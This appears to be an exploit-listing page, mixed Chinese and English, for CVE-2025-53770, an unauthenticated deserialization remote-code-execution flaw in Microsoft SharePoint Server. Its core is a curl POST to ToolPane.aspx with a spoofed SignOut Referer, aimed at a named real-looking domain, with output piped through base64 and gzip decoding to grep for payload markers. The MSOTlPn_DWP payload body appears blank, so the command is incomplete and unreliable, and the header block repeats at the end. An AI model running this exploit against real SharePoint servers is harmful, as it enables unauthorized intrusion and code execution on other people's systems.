Exploit for Deserialization of Untrusted Data in Microsoft CVE-2025-53770

2025-08-02 | CVSS 9.8

https://sploitus.com/exploit?id=428063D1-DB03-5EE8-8BF8-EB17F4390ECE

CVE-2025-53770-SharePoint-反序列化-RCE-PoC

Microsoft SharePoint Server中存在一个关键漏洞，允许通过反序列化不可信数据实现未经身份验证的远程代码执行。微软已知晓该漏洞正在被积极利用；请立即应用CVE缓解措施。严重性：关键。

利用命令

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=



  
    
      
    
  
' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

微软CVE-2025-53770反序列化漏洞利用：SharePoint远程代码执行技术分析

本文详细分析了Microsoft SharePoint Server中存在的CVE-2025-53770反序列化漏洞，该漏洞允许未经身份验证的攻击者实现远程代码执行，CVSS评分高达9.8分。包含具体的PoC利用命令和检测方法。

Exploit for Deserialization of Untrusted Data in Microsoft CVE-2025-53770

https://sploitus.com/exploit?id=428063D1-DB03-5EE8-8BF8-EB17F4390ECE

CVE-2025-53770-SharePoint-反序列化-RCE-PoC

利用命令